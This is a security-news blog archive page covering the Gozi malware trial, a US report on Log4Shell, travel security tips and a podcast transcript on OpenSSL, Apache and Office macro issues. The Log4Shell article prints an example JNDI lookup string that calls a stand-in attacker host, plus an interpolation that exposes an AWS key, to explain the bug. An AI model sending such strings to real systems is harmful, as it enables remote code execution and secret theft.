Category Archives: News

Last member of Gozi malware troika arrives in US for criminal trial

As the English translation of the Baroque-era German rendering of the Ancient Greek philosophical saying goes:

Though the mills of God grind slowly, yet they grind exceeding small/Though with patience he stands waiting, with exactness grinds he all.

Today, this saying is usually applied in respect of the judicial process, noting that although justice sometimes doesn’t get done quickly, it may nevertheless get done, and done meticulously, in the end.

That’s certainly the case for a troika of cybercriminals alleged to have been behind the infamous Gozi “banking Trojan” malware, which first appeared in the late 2000s.

The jargon term banking Trojan refers to malicious software that is specifically programmed to recognise, monitor and manipulate your interactions with online banking sites, with the ultimate aim of ripping off your account and stealing your funds.

Typical banking Trojan tricks include: logging your keystrokes to uncover passwords and other secret data as you type it in; scanning local files and databases hunting for private data such as account numbers, account history, passwords and PINs; and manipulating web data right inside your browser to skim off secret information even as you access genuine banking sites.

Way back in 2013, three men from Europe were formally charged with Gozi-related cybercrimes in a US federal court in New York:

  • NIKITA KUZMIN, then 25, from Moscow, Russia.
  • DENNIS ČALOVSKIS, then 27, from Riga, Latvia.
  • MIHAI IONUT PAUNESCU, then 28, from Bucharest, Romania.

The three mouseketeers

Kuzmin, as we explained at the time, was effectively the COO of the group, hiring coders to create malware for the gang, and managing a bunch of cybercrime affiliates to deploy the malware and fleece victims – an operating model known as crimeware-as-a-service that is now used almost universally by ransomware gangs.

Čalovskis was a senior programmer, reponsible for creating the fake web content that could be injected into victims’ browsers as they surfed the internet in order to trick them into revealing secret data to the crimeware gang instead of to their bank or financial insititution.

And Paunescu was, in effect, the CIO; the IT chieftain who operated a series of what are known in the jargon as bulletproof hosts, a slew of servers and other IT infrastructure carefully hidden away from identification and takedown by law enforcement (or, for that matter, by rival cybercrooks).

Čalovskis was soon arrested in Latvia, but wasn’t immediately deported to the US to stand trial because the Latvian authorities agreed with his legal team that he might face 67 years in prison, which it deemed unreasonably severe. (The US routinely lists maximum penalties in its press releases, even though such long sentences are rarely handed out.)

Ultimately, the two countries and the accused seem to have reached an agreement whereby Čalovskis would receive a prison sentence of at most two years, in return for pleading guilty and waiving the right to appeal.

He was sent to the US, locked up while his legal case ground its way through the courts, and ultimately sentenced to “time served” of 21 months and then kicked out of the US.

Time served means that the judge treats the time spent in custody awaiting trial as sufficient punishment for the crime itself, so that the guilty party is essentially deemed to have completed their official imprisonment at the conclusion of the trial.

Kumin, too, ended up convicted-but-immediately-set-free-for-deportation in 2016, after just over three years locked up in the US while on trial.

But Paunsescu, it seems, was spared extradition by a Romanian court, and remained free until late last year, when he travelled to Colombia and was arrested at Bogotá International Airport by the Colombian authorities.

The Colombians, it seems, then contacted the US diplomatic corps, assuming that the US still considered Paunescu a “person of interest”, and asking whether the US wanted to apply to extradite him from Colombia to stand trial in America.

The US, as you can imagine, was indeed interested in doing just that.

Suspect number 3 touches down in the US

Finally, more than nine years after we wrote about that first indictment in New York, Paunescu has reached the US.

As spokesperson Damian Williams explained in the US Department of Justice’s press release about Paunsecu’s inauspicious arrival in America::

Mihai Ionut Paunescu is alleged to have run a “bulletproof hosting” service that enabled cybercriminals throughout the world to spread the Gozi virus and other malware and to commit numerous other cybercrimes. His hosting service was specifically designed to allow cybercriminals to remain hidden and anonymous from law enforcement. Even though he was initially arrested in 2012, Paunescu will finally be held accountable inside a US courtroom. This case demonstrates that we will work with our law enforcement partners here and abroad to pursue cybercriminals who target Americans, no matter how long it takes.

As the DoJ notes, Paunescu’s criminal nickname (the handle he was known by in the cyberunderworld ) was Virus.

As well as disseminating the Gozi malware, the DoJ also alleges that “the Virus” also distributed other data-stealing malware, including the notorious Zeus and SpyEye strains.

Paunescu faces one charge of conspiracy to commit computer intrusion (10 year maximum sentence), one charge of conspiracy to commit bank fraud (to to 30 years); and one charge of conspiracy to commit wire fraud (up to 20 years).

Although his fellow conspirators are already out of US prison, Paunescu’s stay there is only just starting.



8 months on, US says Log4Shell will be around for “a decade or longer”

Remember Log4Shell?

It was a dangerous bug in a popular open-source Java programming toolkit called Log4j, short for “Logging for Java”, published by the Apache Software Foundation under a liberal, free source code licence.

If you’ve ever written software of any sort, from the simplest BAT file on a Windows laptop to the gnarliest mega-application running on on a whole rack of servers, you’ll have used logging commands.

From basic output such as echo "Starting calculations (this may take a while)" printed to the screen, all the way to formal messages saved in a write-once database for auditing or compliance reasons, logging is a vital part of most programs, especially when something breaks and you need a clear record of exactly how far you got before the problem hit.

The Log4Shell vulnerability (actually, it turned out there were several related problems, but we’ll treat them all as if they were one big issue here, for simplicity) turned out to be half-bug, half-feature.

In other words, Log4j did what it said in the manual, unlike in a bug such a a buffer overflow, where the offending program incorrectly tries to mess around with data it promised it would leave alone…

…but unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of careful input verification on top of Log4j, your software could come unstuck.

Really, badly, totally unstuck.

Interpolation considered harmful

Simply put, Log4j didn’t always record log messages exactly as you supplied them.

Instead, it had a “feature” known variously and confusingly in the jargon as interpolation, command substitution or auto-rewriting, so that you could trigger text manipulation features inside the logging utility itself, without having to write special code of your own to do it.

For example, the text in the INPUT column below would get logged literally, exactly as you see it, which is probably what you’d expect of a logging toolkit, especially if you wanted to keep a precise record of the input data your users presented for regulatory reasons:

INPUT OUTCOME
----------------------- ------------------------
USERNAME=duck -> USERNAME=duck
Caller-ID:555-555-5555 -> Caller-ID:555-555-5555
Current version = 17.0.1 -> Current version = 17.0.1

But if you submitted text wrapped in the magic character sequence ${...}, the logger would sometimes do smart things with it, after receiving the text but before actually writing in into the logfile, like this:

INPUT OUTCOME
---------------------------------- -------------------------------------------
CURRENT=${java:version}/${java:os} -> CURRENT=Java version 17.0.1/Windows 10 10.0
Server account is: ${env:USER} -> Server account is: root
${env:AWS_ACCESS_KEY_ID} -> SECRETDATAINTENDEDTOBEINMEMORYONLY

Clearly, if you’re accepting logging text from a trusted source, where it’s reasonable to allow the loggee to control the logger by telling it to replace plain text with internal data, this sort of text rewriting is useful.

But if your goal is to keep track of data submitted by a remote user, perhaps for regulatory record-keeping purposes, this sort of auto-rewriting is doubly dangerous:

  • In the event of a dispute, you don’t have a reliable record of what the user actually did submit, given that it might have been modified between input and output.
  • A malicious user could send sneakily-constructed inputs in order to provoke your server into doing something it wasn’t supposed to.

If you’re logging user inputs such as their browser identification string, say (known in the jargon as the User-Agent), or their username or phone number, you don’t want to give the user a chance to trick you into writing private data (such as a memory-only password string like the AWS_ACCESS_KEY_ID in the example above) into a permanent logfile.

Especially if you’ve confidently told your auditors or the regulator that you never write plaintext passwords into permanent storage. (You shouldn’t do this, even if you haven’t officially told the regulator you don’t!)

Worse to come

In the Log4Shell is-it-a-bug-or-is-it-a-feature case, however, things were much worse than the already-risky examples we’ve shown above.

For example, a user who deliberately submitted data like the input shown below could trigger a truly dangerous sequence of events:

INPUT OUTCOME ------------------------------------------------ ----------------------------------------
${jndi:ldap://dodgy.server.example:8888/BadThing} -> Download and run a remote Java program!?

In the “interpolation” string above, the ${...} character sequence that includes the abbreviations jndi and ldap told Log4j to do this:

  • Use the Java Naming and Directory Interface (JNDI) to locate dodgy.server.example online.
  • Connect to that server via LDAP, using TCP port 8888.
  • Request the data stored in the LDAP object BadThing.

In other words, attackers could submit specially-crafted input that would instructed your server to “call home” to a server under their control, without so much as a by-your-leave.

How could this be a “feature”?

You might be wondering how a “feature” like this ever made it into the Log4j code.

But this sort of text rewriting can be useful, as long as you’re logging data from a trusted source.

For example, you could log a numerical user ID, but also ask the logger to use LDAP (the lightweight directory access protocol, widely used in the industry, including by Microsoft’s Active Directory system) to retrieve and save the username associated with that account number at that time.

This would improve both the readability and the historical value of the entry in the logfile.

But the LDAP server that Log4j called out in the example above (which was chosen by the remote user, don’t forget) is unlikely to know the truth, let alone to tell it, and a malicious user could therefore use this trick fill up your logs with bogus and even legally dubious data.

Even worse, the LDAP server could return precompiled Java code for generating the data to be logged, and your server would dutifully run that program –- an unknown program, supplied by an untrusted server, chosen by an untrusted user.

Loosely speaking, if any server, anywhere in your network, logged untrusted input that had come in from outside, and used Log4j to do so…

…then that input could be used as a direct and immediate way to trick your server into run someone else’s code, just like that.

That’s called RCE in the jargon, short for remote code execution, and RCE bugs are generally the most keenly sought by cybercriminals because thay can typically be exploited to implant malware automatically.

Unfortunately, the nature of this bug meant that the danger wasn’t limited to internet-facing servers, so using web servers written in C, not Java (e.g. IIS, Apache https, nginx), and therefore didn’t themselves use the buggy Log4j code, didn’t free you from risk.

In theory, any back-end Java app that received and logged data from elsewhere on your network, and that used the Log4j library…

…could potentially be reached and exploited by outside attackers.

The fix was pretty straightforward:

  • Find old versions of Log4j anywhere and everywhere in your network. Java modules typically have names like log4j-api-2.14.0.jar and log4j-core-2.14.0.jar, where jar is short for Java archive, a specially-structured sort of ZIP file. With a searchable prefix, a definitive extension, and the version number embedded in the filename, quickly finding offending files with “the wrong” versions of Java library code is actually fairly easy.
  • Replace the buggy versions with newer, patched ones.
  • If you weren’t in a position to change Log4J version, you could reduce or remove the risk by removing a single code module from the from the buggy Log4j package (the Java code that handled JNDI lookups, as described above), and repackaging your own slimmed-down JAR file with the bug suppressed.

The saga continues

Unfortunately, a recent, detailed report on the Log4Shell saga, published last week by the US Cybersecurity Review Board (CSRB), part of the Department of Homeland Security, contains the worrying suggestion (our emphasis below) that:

[T]he Log4j event is not over. The [CSRB] assesses that Log4j is an “endemic vulnerability” and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.

What to do?

At 42 pages (the executive summary alone runs to nearly three pages), the Board’s report is a long document, and parts of it are heavy going.

But we recommend that you read it through, because it’s a fascinating tale of how even cybersecurity problems that ought to be quick and easy to fix can get ignored, or put off until later, or as-good-as denied altogther as “someone else’s problem” to fix.

Notable suggestions from the US public service, which we wholeheartedly endorse, include::

  • Develop the capacity to maintain an accurate information technology (IT) asset and application inventory.
  • [Set up a] documented vulnerability response program.
  • [Set up a] documented vulnerability disclosure and handling process.

When it comes to cybersecurity, ask not what everyone else can do for you…

…but think about what you can do for yourself, because any improvements you make will almost certainly benefit everyone else as well.


[embedded content]


7 cybersecurity tips for your summer vacation!

It’s prime vacation season in the Northern Hemipshere, and in some countries, July and August aren’t just months when some people take some days off, but a period of extended family holidays, often involving weeks away from home or on the road.

The good news, of course, is that if you’ve had to work from home over the past two years, you’re probably better informed about outside-the-office cybersecurity than ever.

The bad news, however, is that although working from home generally offers less “IT shelter” than working from work, and has therefore taught a lot of us plenty about cybersecurity that we didn’t know before…

…your home network almost certainly provides much more IT shelter than you’ll get while you’re on the road, especially if you’re bursting to set off on a vacation you’ve been waiting nearly three years to enjoy!

So, we decided to answer the most common travel questions that people either [a] worry about instead of informing themselves before they set off, or [b] don’t think about at all until it’s too late.

Here you are – have fun, but travel safely!

Q1. Should I make a backup before I set off?

A1. Yes. We suspect that you’re more likely to lose or damage a phone or laptop (or, worse, have it stolen) while travelling than while working from home or in the office.

Remember the simple but effective Sophos Naked Security saying: “The only backup you will ever regret is the one you didn’t make.”

Backing everything up reliably before you set off also means you are free to strip down the amount of digital content you keep loaded on your devices, and thus to reduce the quantity of data you might have to declare or reveal at a border crossing. (See Q3.)

Useful article:


Q2. Should I encrypt my laptop and my mobile phone?

A2. Yes. Most modern mobile phones come pre-encrypted, but the encryption depends on having a decent lock code, which is used to access the underlying encryption and decryption keys.

Don’t settle for an easy lock code for travelling, just in case you get into a crisis and think you might forget it.

Pick a nice, long lock code (we recommend 10 digits or more, and we don’t mean 00000 00000 or 12345 12345), and practise using it regularly for a few days before you leave, until you can remember it easily.

Useful article:


Q3. Should I be worried about crossing national borders?

A3. Worrying will get you nowhere. Don’t be worried, be prepared.

Many countries with border checks reserve the right to ask you to unlock your electronic devices as a condition of entry, and to let them have a look. Some countries may even ask to make what’s called a forensic copy, meaning they copy every sector off the device, even disk sectors containing data you previously deleted. (This can take quite a while, so it could turn a 10-minute border crossing into a multi-hour delay.)

Some countries ask you to state not merely your home address and your phone number, but also to hand over your email and social media addresses, too.

You’re almost certainly entitled to refuse to provide that sort of detail, but in return you should assume that the country you’re trying to enter will refuse to admit you – it’s very much a case of “My Kitchen, My Rules.”

So, prepare yourself before you go by checking up on the entry requirements of anywhere you’re planning to visit. If you don’t like the conditions, then either don’t go there, or don’t take all your electronic devices or all your data with you.

Useful article:


Q4. Should I use public Wi-Fi when I’m on the road?

A4. If you want. The dangers of public Wi-Fi are often over-exaggerated, and can largely be avoided if you stick to apps with proper encryption, and if you only use websites with URLs that start https://, short for “secure HTTP”. This scrambles the data before it leaves your laptop or phone, and (in theory) only unscrambles it after it reaches the other end. Computers in between can’t easily snoop on or sneakily alter the data going back and forth.

However, if you access services in the country you are visiting that demand you to install a special digital certificate (for example, “for security or regulatory reasons”), this means your browsing almost certainly can be spied upon while you’re there, and even after you get back home.

If you don’t like using public Wi-Fi, consider buying a local SIM card with a pre-paid data plan for the duration of your visit. But remember that most countries require their telephone providers to have so-called lawful interception facilities, so a mobile data plan isn’t anonymous just because you bought a “burner” SIM card at a convenience store.

Useful background information:


Q5. Should I use kiosk PCs in airports or hotels?

A5. No. We strongly suggest that you don’t, unless you can’t avoid it. (If it’s unavoidable, limit your logins and how much data you expose as much as you can. For example, if you need to use a hotel kiosk PC to print off a boarding card before leaving for the airport, don’t check your Facebook account at the same time!)

The problem with kiosks is not just that you have to trust the company that runs them, e.g. the hotel or the airport operator, and every techie who services them, but also everyone else who’s used those kiosk computers before you and could have meddled with them.

Unlike a hacked Wi-Fi access point, which can only sniff out data (hopefully encrypted) between you and its destination, a hacked kiosk PC may have unfettered access to all the data you send and receive during the period that it’s unencrypted, could be tracking every keystroke you type, could take screenshots of everything you do, and could retain an exact copy of everything you print.

Useful background information (from 2010):


Q6. What about spycams in hotel rooms and Airbnbs?

A6. We can answer that partially, but not with the simplicity and the precision you would probably like.

Unfortunately, spycams hidden in guest quarters are a real thing, and in the pre-pandemic year of 2019, we wrote about three different incidents where guests found “peeping Tom” cameras in their rooms: at a farm work hostel in Australia; at an Airbnb house in Ireland; and in a South Korean hotel. (In the first and last of those cases, we’re pleased to say, the perpetrators were arrested and charged.)

Sometimes, hidden cameras are fairly easy to spot if you search your room or rooms carefully. But spycams can be tiny enough to hide almost anywhere, and they won’t always show up on the property’s public Wi-Fi network.

Sadly, this means that not finding a spy camera doesn’t mean there isn’t one.

All we can advise is this:

  • Search for obvious hiding places. Clocks that are curiously positioned, duplicate smoke alarms, electronic “gizmos” where they aren’t needed, signs of digital devices squeezed into vents, and so forth.
  • If you find one, photograph it, and also photograph the property to show that you haven’t caused any damage that could be used an as excuse or a counterclaim by the perpetrator.
  • Keep your clothes on, and leave the property if you can.
  • Report the incident to the local police and to the head office of the hotel or rental agent.

To reduce the risk of being recorded while typing in passwords or lock codes, shield your keyboard or phone when entering critical data whenever you are in locations you don’t trust fully, just as you do (or should do) when using a bank ATM (cash machine) or a payment terminal in a shop.

Useful article:

How-to video:


Q7. What if I want to take my work laptop along?

A7. We can’t answer that. Only your work can, so the simple answer is, “Ask.”

If they say “No”, that’s that. Leave it behind, perhaps even locked up at work.

If they say “Yes”, they are likely to ask you where you’re going and then hand out advice (or specific requirements) for your chosen destination.

Take their advice. After all, if the company thinks its data might be at extra risk in the country you’re visiting, then your personal data will almost certainly be at extra risk too. So, treat work’s advice as a benefit, not a hindrance!


The bottom line

In short, have fun, but don’t take more devices or data than you need, read up on any privacy and surveillance rules at your destination before you set off, and be aware of your surroundings when entering personal data.

Remember:  If in doubt/Don’t give it out.

And:  If your life’s on your phone/Why not leave it at home?

Buying a cheap phone that’s good enough for your vacation may end up costing less than the first round of beachfront cocktails you’re looking forward when you get there…


Main image of Copocabana beach thanks to Bisonlux on Flickr, under a CC BY 2.0 licence.


S3 Ep91: CodeRed, OpenSSL, Java bugs and Office macros [Podcast + Transcript]

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point. You can also listen directly on Soundcloud.

With Doug Aamoth and Paul Ducklin.

Intro and outro music by Edith Mudge.

You can listen to us on Soundcloud, Apple Podcasts, Google Podcasts, Spotify, Stitcher and anywhere that good podcasts are found. Or just drop the URL of our RSS feed into your favourite podcatcher.


READ THE TRANSCRIPT

DOUG.  A brief history of Office macros, a Log4Shell style bug, two OpenSSL crypto bugs, and more…

…on the Naked Security podcast.

[MUSICAL MODEM]

All right, welcome to the podcast, everybody.

I am Doug Aamoth, and he is Paul Ducklin.

Paul, how do you do?


DUCK.  I’m well, Doug!

Welcome back – hope you enjoyed last week off.


DOUG.  Thank you, I did.

It was warm, but not as warm as it is where you are now.


DUCK.  We’re having what in the UK counts as a heatwave, and there’s not a breath of wind today, so it is pretty sweltering.


DOUG.  Perhaps you will make history with the hottest recorded temperature?

But I will give you this bit of tech history while you wait…

This week, in 2001, the CodeRed worm started making its way through the internet.

It attacked computers running Microsoft IIS Web server, and spread by leveraging a buffer overflow.

And my, how times have…

..haven’t changed much, a couple of decades later.


DUCK.  Yes!

And when CodeRed happened, everyone said, “Oh, golly. One of the ways it spreads is just like what the Internet worm, the Morris Worm, did, way back in 1988. Have we learned nothing?”

And it turns out that was a rhetorical question, Doug.

[LAUGHTER]


DOUG.  Do you remember dealing with this worm?


DUCK.  It’s not one of the ones that one would ever forget, because of the speed and suddenness of it all…

…and the fact that it’s this network packet that just showed up, and then went revving off elsewhere.

I think the huge deal, particularly given the timing of it, at the beginning of the 21st century, was that although it fortunately didn’t have any badness directly programmed into it such as “Hey, download ransomware and scramble the computer”, it nevertheless generated so much network traffic…

Outbound traffic for you, attacking the next guy, and inbound for everyone else.

And with lots and lots of countries having very strict internet usage caps in those days, it raised the issue of, “Who’s going to pay? I didn’t ask for this traffic. I didn’t ask to have somebody who hadn’t secured their IIS server pound me. I couldn’t actually stop this. It reached my router because it got through the ISP!”

So there was this whole thing of, “Who takes responsibility? Who pays for it?”

I was in Sophos Australia at the time, and my ISP actually came out and said they were basically going to unmeter everything, loosely speaking, for a bit, while they got to the bottom of it.

So, fortunately, it ended without too many tears, but it is a great indicator that sometimes the side effects of malware, even if it was intended as a “prank” right at the start, can be much worse than dangerous things that are programmed into the malware itself.


DOUG.  I love listening to these stories of you living through these awful times, even though they were awful, because it’s such a good context for stuff that’s going on now… because it hasn’t changed all that much.


DUCK.  Fortunately, Doug, we did have good mobile phone coverage in those days.

So at least you knew that you could phone home and say, “I might be a bit late.”

[LAUGHTER]

I’m glad to have lived through it, but I would not have said that at the time!


DOUG.  Well, speaking of coming home late, there are OpenSSL two “one-liner” crypto bugs that some headlines are referring to as ‘Worse Than Heartbleed’.


DUCK.  These are fascinating bugs.

They were basically what I call one-liners… in other words, with one line of code changed or added, the bug could be fixed.

And one of them was specific to the special numeric calculations for public key cryptography.

That one was CVE-2022-2274: Memory overflow in RSA modular exponentiation.

I won’t go into what modular exponentiation is, but it’s basically multiplying a number by itself over and over and over again and doing divisions as you go along.

And it turns out that you can greatly accelerate that iterative calculation if you have a CPU or chip in your computer that supports what’s called vector arithmetic, which is where you do the same calculation at the same time on multiple lots of data, so you effectively get four instructions for the price of one.

And some Intel chips have a super-special, extra-powerful version of that called AVX512.

And so OpenSSL goes, “Well, if you’ve got that chip, I’ll use this super-fast extra way of accelerating everything.”

And in the middle of it, the programmer was given a number of bits that were supposed to be copied from A to B in memory…

…but in fact, because the code is dealing with a special chip that works with big integers, the programmer didn’t copy N bits.

They copied N unsigned long integers, meaning that this was a memory buffer overflow of potentially spectacular proportions – you could be copying 64 times as much data as there was space for!

And so, one line fixed it: take the number of bits, and divide it down to convert it into the number of *integers* you need to copy instead of the number of bits.

Literally a one line fix.

Phew!


DOUG.  OK, what about the other one?


DUCK.  The other one is the delightfully named CVE-2022-2097: Data leakage in AES-OCB encryption.

This is a special type of what’s called “authenticated encryption”.

Again, I won’t go into that, but it’s a way of doing AES encryption where you take a number of 16-byte chunks, and you scramble those chunks one-by-one.

And in this particular variant of AES encryption, the programmer was supposed to go through the blocks from 1 to N, encrypting them, starting at block 1, 2, 3… up to to and including N, thereby scrambling every block in the input.

Unfortunately, the code went from 1 to a value *less than* N, not *less than or equal to* N.

So the last block that was supposed to be encrypted never got encrypted!

And so, depending on how you were using the algorithm, it could actually mean that the encrypted data that you got back, and maybe saved to disk, was all perfectly encrypted, *except that the last 16 bytes would still be the original plaintext*.

So, plaintext would leak out every time you used the algorithm, which is not the idea of an encryption algorithm!

Everything or nothing, not arbitrary parts of it.

That too was fixed by a single-line change.

A test for “less than” was changed to a test for “less than or equal to” – a one-byte change in the final compiled code.

Wow!


DOUG.  OK, so you say the modular exponentiation bug is more severe, but you should just update them both, right?


DUCK.  Yes, the fixes are there, and they work, and they should be uncontroversial.

That’s the nice thing about a one-liner fix – it’s not like you’re changing an algorithm or changing the API.

So I think it’s a very uncontroversial update to apply.

And there are two updates, for the two supported versions of OpenSSL.

Version 3.0.4 gets updated to 3.0.5 – that has both the fixes in, because both the bugs are in that code.

And OpenSSL 1.1.1 goes from version P-for-Papa to Q-for-Quebec.

That doesn’t have the modular exponentiation bug; it only has the other one.

But one bug is bad enough!

So here’s my advice: Patch early, patch often, as always.


DOUG.  OK, you can read about that on nakedsecurity.sophos.com.

Now we move from something called ‘Worse than Heartbleed’… [WHISPERS] but it doesn’t sound like it was actually worse than Heartbleed.


DUCK.  No, I think that makes good headline, though!


DOUG.  Yes, of course!

But now, we have a Log4Shell-style bug in Apache…


DUCK.  Yes, that makes a good headline as well: “It could be like Log4Shell!”

And I have to be honest, I did use the word Log4shell in the Naked Security headline, but I just described it as a ‘Log4Shell-style bug’, because it is.

And to me, that’s the most important part here, for any programmers now coming onto the scene.

Try not to make this mistake, which is the same sort of blunder that was made in the Log4Shell bug, and the same sort of blunder that we spoke about recently in Microsoft Follina.

And yes, Doug, it involves dollar signs and brackets.

If you remember Log4Shell…

If I said, “Log this word: DOUG,” then it would log DOUG, exactly as I sent it.

But if I said log this word: ${special_weird_command}, then I was actually telling the other end, “No, don’t log what I sent you. Do some funky calculations *based on what I sent you*, even though you can’t trust it, and then take the result of that, and log that instead.”

Sounds dangerous, because it is dangerous!

In Follina, it was $(command), where instead of that text being used literally and exactly to identify a file name, Windows would go, “Oh, hang on. What you should do is: don’t use that as the file name, but run what’s in the brackets *as a PowerShell command* and use that as the file name.”

And this was very much the same.

Because it’s Java, it’s like Log4Shell: ${dangerous_stuff}.

That’s how it worked.

Now, the code that the bug was in is called Apache Commons Configuration.

It’s a free utility library, part of the Apache Commons set of sub-projects, which is a load of super-useful packages and stuff.

And this one lets you handle configuration files – it’ll handle XML files, and it’ll handle INI files, and a whole load of other stuff.

And that dangerous stuff could be: “Run a command and take the output of the command,” which obviously means potential remote code injection.

It could be: “Do a DNS lookup with this computer name, and see what comes back.”

That’s a very simple, low-key way of exfiltrating data in the middle of a servername lookup request.

And the last one: you could say, “Go to this URL and, whatever comes back, use that.”

You’ve supplied data, but you actually get to instruct the other end, “Hey, run a command, do a DNS lookup, or visit my website.”

So even though you can’t send it code back to run, in the case of the website lookup, it means you’ve forced an outbound request, so you could have leaked all sorts of stuff to the crooks…

…and clearly, at least by default, that’s a terribly bad idea!

In the last few versions of this Apache Commons Configuration (by a few versions, I mean over the last few years), this was added as a “feature”, but of course it turns out to be more of a liability.

So, in the latest version, that behaviour has been understandably reversed.


DOUG.  OK, that’s been sitting there since 2018 but has been patched in version 2.8.0, which you should update to if you can.

And we’ve got some instructions on the site on Naked Security, in the article, about how to check if you’re vulnerable.

So people can go there to check that out.


DUCK.  And of course the advice to programmers is: if you are writing code that can accept potentially untrusted data and has any kind of ${...} or $(...) feature meaning, “Hey, run this command that someone else decided upon”…

…check your inputs and outputs!

Not that we’ve ever said that before, Doug.

[LAUGHTER]

Don’t go for convenience over security if you can possibly help it.


DOUG.  Great!

All right, check that out: that article is on nakedsecurity.sophos.com.

Now, we come to my favorite article of the week, because it offers a brief history of Office macros, and then a little back-and -forth wherein everyone seemingly was saying, “Come on, Microsoft! Do this thing”…

…and then Microsoft did the thing, and then everyone’s saying, “Why did you do that?”


DUCK.  Yes!

You may have oversimplified slightly… or at least you’ve left out the key thing: it took 20 years for Microsoft to get around to putting this feature in, but only 20 weeks to go, “Oh, golly, we’re taking it out again!”

I don’t think *everybody* told them to remove it… I just think that there was an unfortunate side-effect that hit not a majority, but a sufficiently vocal small minority, so Microsoft had to go, “OK, we’re backing this off for a bit, but watch this space, we’ll be back! We meant to put this feature in, and we now intend to. It took us 20 years to think about it. We won’t be diverted at this stage.”

And that feature is that if you receive an Office file of a certain type (in particular Word, Excel and PowerPoint amongst others)… if you receive such a file that contains macros, executable , visual Basic for Applications code, and the file came off the internet, then *the macros just won’t work*.

Initially, in the early days, hey, they just worked whenever, and that was clearly a disaster.

And then Microsoft tightened things up a bit, and they said, “If it came off the Internet, we’ll pop up a warning and you’ll have to go, Yes, I really want to do this.”

And we’ll have a non-default feature that well-informed sysadmins can use, saying. “No, I don’t want to *ask*, I want to *tell* users, Sorry, you can’t do it.”

And finally Microsoft decided, “You know what, it seems that when you have this non-default feature turned on, it greatly reduces the risk that you will get phished using documents with macros in. so we’re going to make it the default.”

And that was the change they announced… I think we spoke about on the podcast, what was it, back in February or March 2022?

And they implemented it, but it turned out, like you said, that you can please some of the people some of the time, but not all of the people all of the time!

[LAUGHTER]

And in this case, for better or for worse, I guess the squeaky wheel got the oil, because what some people are saying is, “No, this is a step too far! How dare you protect me from myself? ”

[LAUGHTER]

So there we are.

But, like I said, Microsoft is apparently insisting, “This feature is coming back!”

Myself, I wish they could have done this 20 years ago.


DOUG.  Given that this is again not on by default, you can take steps to lock this down yourself.


DUCK.  If you have a Windows network where you can use Group Policy, for example, then as an administrator you can turn this function on to say, “As a company, we just don’t want macros off the internet. We’re not going to even offer you a button that you can say, Why not? Why not let the macros run?”

But if you’re a smaller business, just with a few people working together, and you’re working with cloud-based services, including Microsoft cloud services, it may not be quite so easy.

You can apply Group Policy protections by editing the registry on your own computer… it’s not that hard, but there isn’t just a magic button you can easily press to do it if you want.

So, if you’re a small business, I would just suggest that you read about this, learn what the change is meant to do for you, and see if you can accommodate it for when it comes back.

Because all the evidence suggests that this does make a useful impact on document-based phishing where crooks use documents to sneak dodgy code into the company and then trick you into running it by going, “Yes, you need to click this to decrypt the document, or to un-copyprotect it, or to reveal the hidden content.”

And, lo and behold, you press the button; you authorise something that you shouldn’t have… after which, bad stuff happens and next thing you know, your computer is being invaded.

So it seems that as a protective vehicle, it does work.

It’s just ironic that what I was almost ready to describe as “Too little, too late” ended up, for some people, being “Too much, too soon.”

But we’ll get there in the end, I think… just hang in there if you don’t yet quite know what to do.


DOUG.  All right, we will keep an eye on that.

And last, but certainly not least, is a story about paying ransomware crooks.

So… I have a business; I get hit with ransomware; I get regulators coming after me saying, “You got hit by ransomware, you’re in big trouble for not protecting people’s data”… and I say, “But I paid the ransom, that’s got to be worth something, right?


DUCK.  Yes. I must admit, I was quite surprised that this became the deal that it was, but I thought it was important to remind people about it.

Now, it’s a UK-specific story, as it stands, because it’s an open letter that came from the UK Information Commissioner’s Office (ICO), backed by the National Cybersecurity Center (NCSC), which is part of the secret intelligence service in the UK.

It’s an open letter to attorneys, to lawyers, around the UK, and I suspect that there will be many other countries where lawyers, perhaps understandably, are kind of thinking along these lines… of saying to people, “Look, if you’re stuck with paying the ransom to get the data back, and it’s going to get the business going again, it’s not illegal. And given that’s the negotiation that the crooks want to do, so they don’t leak the data, we can’t for the life of us see why that would make the regulator more cross than if you just showed the middle finger to the crooks, and they did leak the data and bad things happened.”

Thus this open letter – like I said, specific to the UK, but there may be other countries where people are thinking along these lines.

And, as the Information Commissioner’s Office very bluntly put it:

It has been suggested to us that a belief persists that payment of a ransom may protect the stolen data and or result in a lower penalty by the regulator should it undertake an investigation.”

[LAUGHS]

But here’s the kicker:

We would like to be clear that this is not the case. […] For the avoidance of doubt, the Information Commissioner’s Office does not consider the payment of monies to criminals who have attacked a system as mitigating the risk to individuals, and this will not reduce any penalties incurred.

Paying the crooks for getting you out of the hole that the crooks dug you into… it’s not a security precaution!

Who knew, Doug?

[LAUGHTER]


DOUG.  Seriously…

And you do say in the article… I thought this was interesting, you are reasonable about this: “If it’s likely to be the only hope of saving your business and keeping your staff and their jobs, it seems fair to consider paying up as a sort of necessary evil.”


DUCK.  The regulator in the UK is saying it’s not automatically unlawful to pay ransomware demands.

In the UK, there’s no actual law that says: if you do it, you’re a criminal yourself.

Although the ICO says it hopes, as far as it can, that you don’t pay up, it can’t stop you. But there may be reasons, you do need to remember, particularly in the current era, for which you may nevertheless get into trouble because of what they call the “relevant sanctions regulations, particularly those related to Russia.”

Although it’s not blanket unlawful to pay ransoms in general in the UK (I don’t know whether any countries have that rule yet), there may be cases where you are not supposed to pay or not *allowed* to pay for other reasons… because of where the money is going.

And, of course, if you do pay, then you have little choice but to risk being in trouble for that.

So the regulators are warning you that, although you may want to pay with the deepest dread in your heart… do your very best to avoid doing so!

And, of course, all those other reasons that we spoke about when we talked about this year’s Sophos Ransomware Survey

Basically, paying up should only ever be a last resort.

What were the stats in our latest survey? A third of the people only got half their data back. (They don’t get to choose which half it is, by the way!)

That’s the important thing to remember… and at least some of the people who paid up got nothing at all.

And very few of the people who did pay up actually got everything back.

So the idea that, “I will pay – obviously, it’ll at least get my business running again, and the regulator might go, ‘Well, at least you tried to make the best of a bad job’”…

The first part doesn’t work that way.

You might get absolutely nothing at all after you paid the money.

Colonial Pipeline spent, what $4.4 million, was it?

And what did they get? A decryptor that was so slow they couldn’t even use it – they just went for their backups anyway, which they could have done, and kept $4.4 million in their pocket.

And the fact that the regulator is not going to thank you for paying the money and say, “Gosh, what a thoughtful person you were.”

The least they’re going to do is say, “Irrelevant. You didn’t look after the data properly; you didn’t mitigate the risk as you should. Let’s talk about what we’re going to do to punish you, and make sure you don’t do it again.”


